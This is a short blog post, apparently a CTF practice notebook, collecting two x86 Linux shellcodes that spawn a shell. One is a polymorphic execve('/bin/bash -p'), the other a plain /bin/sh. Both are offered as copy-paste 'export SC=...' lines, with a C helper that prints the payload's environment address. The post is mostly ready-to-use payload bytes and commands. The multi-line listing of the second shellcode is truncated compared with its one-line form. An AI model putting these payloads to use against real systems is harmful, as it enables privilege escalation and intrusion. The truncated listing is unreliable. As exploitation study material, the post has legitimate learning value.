mercredi 26 mars 2014

Two shellcodes and a bit of code

Usually, when you solve a challenge, you have to launch a shell. One of these way is to put a shellcode in an environment variable, and get its address.

As a reminder, I put there two shellcodes I use. The first one comes from http://www.shell-storm.org/shellcode/ and is a polymorphic shellcode launching
execve("/bin/bash", ["/bin/bash", "-p"], NULL):
    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
    "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
    "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
    "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
    "\x71\x8a\xe2\x53\x6b\x69\x69\x30"
    "\x63\x62\x74\x69\x30\x63\x6a\x6f"
    "\x8a\xe4\x53\x52\x54\x8a\xe2\xce"
    "\x81"

On a single line, for a convenient copy-paste:
export SC="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"

Another shellcode is a simpler one, taken from wikipedia, launching /bin/sh on a x86 machine:
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

and the shellcode in one-line:
export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"


Once done, a single C program can read the address of the shellcode:
#include <stdio.h>
int main(void) {
printf("SHELLCODE found at %08x\n", (unsigned int)getenv("SC"));
return 0;
}

Just compile it, and you get the address:
mitsurugi@mitsu:~$ make sc
cc     sc.c   -o sc
mitsurugi@mitsu:~$ export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
mitsurugi@mitsu:~$ ./sc
SHELLCODE found at bff18dcf
mitsurugi@mitsu:~$